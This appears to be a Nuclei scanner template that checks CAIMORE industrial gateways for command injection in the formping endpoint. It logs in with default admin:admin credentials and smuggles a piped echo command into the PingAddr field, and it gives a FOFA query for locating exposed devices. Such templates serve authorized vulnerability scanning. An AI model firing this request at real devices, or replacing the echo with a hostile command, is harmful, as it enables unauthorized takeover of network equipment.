id: caimore-gateway-rce

info:
  name: CAIMORE Gateway - Remote Code Execution
  author: momika233
  severity: high
  description: |
    The gateway of Xiamen Caimao Communication Technology Co., Ltd. is designed with open software architecture. It is a metal shell design, with two Ethernet RJ45 interfaces, and an industrial design wireless gateway using 3G/4G/5G wide area network for Internet communication. There is a command execution vulnerability in the formping file of the gateway of Xiamen Caimao Communication Technology Co., Ltd. An attacker can use this vulnerability to arbitrarily execute code on the server side, write to the back door, obtain server permissions, and then control the entire web server.
  reference:
    - https://www.ctfiot.com/126482.html
  metadata:
    max-request: 2
    fofa-query: app="CAIMORE-Gateway"
  tags: ciamore-gateway,rce,authenticated,intrusive

http:
  - raw:
      - |
        POST /goform/formping HTTP/1.1
        Host: {{Hostname}}
        Authorization: Basic {{base64(username + ':' + password)}}
        Accept-Encoding: gzip

        PingAddr=127.0.0.1%7Cecho%20{{randstr}}&PingPackNumb=1&PingMsg=
      - |
        GET /pingmessages HTTP/1.1
        Host: {{Hostname}}
        Authorization: Basic {{base64(username + ':' + password)}}
        Accept-Encoding: gzip

    attack: pitchfork
    payloads:
      username:
        - admin
      password:
        - admin

    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - "{{randstr}}"

      - type: status
        status:
          - 200

# digest: 4a0a00473045022100f1c59c82eeb72e14e9ac3bee3d86be3945598142b1dc170ba772eda38078b7ee02204c139e6d528334ebeb31c4f9a04fe0de155bbd472451bed27b56a945e896e718:922c64590222798bb761d5b6d8e72950